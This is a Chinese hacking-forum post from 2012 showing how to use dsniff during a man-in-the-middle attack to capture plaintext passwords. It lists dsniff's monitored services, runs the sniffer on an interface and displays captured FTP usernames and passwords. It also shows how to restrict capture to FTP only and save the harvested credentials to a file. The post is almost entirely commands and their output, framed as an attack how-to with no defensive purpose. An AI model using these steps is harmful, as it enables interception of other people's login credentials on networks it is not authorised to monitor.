切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
41 中间人攻击 dsniff 之 获得明文密码[复制链接]
发表于 2012-8-13 00:15:00 | 显示全部楼层 |!read_mode!
dsniff咋说呢? 这个命令方式很多。。。
首先了解本质,欺骗到的数据把明文提取出来 ,不像tcpdump一样的蛋疼,首先微观他:
  1. root@Dis9Team:~# cat /usr/share/dsniff/dsniff.services
  2. # $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $
  3. #
  4. # Network services, dsniff style
  5. #
  6. ftp                21/tcp
  7. telnet                23/tcp
  8. smtp                25/tcp
  9. pptp                47/ip
  10. http                80/tcp
  11. ospf                89/ip
  12. http                98/tcp
  13. poppass                106/tcp
  14. pop2                109/tcp
  15. pop3                110/tcp
  16. portmap                111/tcp
  17. portmap                -111/tcp
  18. portmap                111/udp
  19. portmap                -111/udp
  20. vrrp                112/ip
  21. nntp                119/tcp
  22. smb                139/tcp
  23. imap                143/tcp
  24. snmp                161/udp
  25. imap                220/tcp
  26. telnet                261/tcp
  27. ldap                389/tcp
  28. mmxp                417/tcp
  29. mmxp                417/udp
  30. rlogin                512/tcp
  31. rlogin                513/tcp
  32. rlogin                514/tcp
  33. rip                520/udp
  34. smtp                587/tcp
  35. socks                1080/tcp
  36. tds                1433/tcp
  37. tds                1433/udp
  38. citrix                1494/tcp
  39. oracle                1521/tcp
  40. oracle                1526/tcp
  41. sniffer                2001/udp
  42. cvs                2401/tcp
  43. mmxp                2417/tcp
  44. mmxp                2417/udp
  45. tds                2638/tcp
  46. http                3128/tcp
  47. icq                4000/udp
  48. napster                4444/tcp
  49. aim                5190/tcp
  50. postgresql        5432/tcp
  51. napster                5555/tcp
  52. pcanywhere        5631/tcp
  53. x11                6000/tcp
  54. x11                6001/tcp
  55. x11                6002/tcp
  56. x11                6003/tcp
  57. x11                6004/tcp
  58. x11                6005/tcp
  59. napster                6666/tcp
  60. irc                6667/tcp
  61. irc                6668/tcp
  62. irc                6669/tcp
  63. tds                7599/tcp
  64. napster                7777/tcp
  65. http                8080/tcp
  66. napster                8888/tcp
  67. aim                9898/tcp
  68. pcanywhere        65301/tcp
  69. mountd                100005/rpc
  70. ypserv                100004/rpc
  71. yppasswd        100009/rpc
  72. root@Dis9Team:~#
复制代码
这是他的规则,他能ARP这么多东西,基本的命令:
dsniff -i 网卡 // 全部网卡的数据 全部协议


  1. root@Dis9Team:~# dsniff -i eth0
  2. dsniff: listening on eth0
  3. -----------------
  4. 06/02/12 06:09:29 tcp 5.5.5.129.1031 -> unassigned.psychz.net.21 (ftp)
  5. USER fuck
  6. PASS test
复制代码
成功获取了FTP密码,如果只是ARP某个协议咋办?微观:/usr/share/dsniff/dsniff.services
然后新建个文件


  1. root@Dis9Team:~# nano ftp
  2. root@Dis9Team:~# cat ftp
  3. ftp                21/tcp
  4. root@Dis9Team:~#
复制代码


我只欺骗FTP的数据,接下来:
  1. root@Dis9Team:~# dsniff -i eth0 -f ./ftp
  2. dsniff: listening on eth0
  3. -----------------
  4. 06/02/12 06:12:21 tcp 5.5.5.129.1039 -> unassigned.psychz.net.21 (ftp)
  5. USER wwwwww
  6. PASS wwwww
复制代码


参数 -w pass.txt 保存为pass.txt

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-8-12 14:45

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部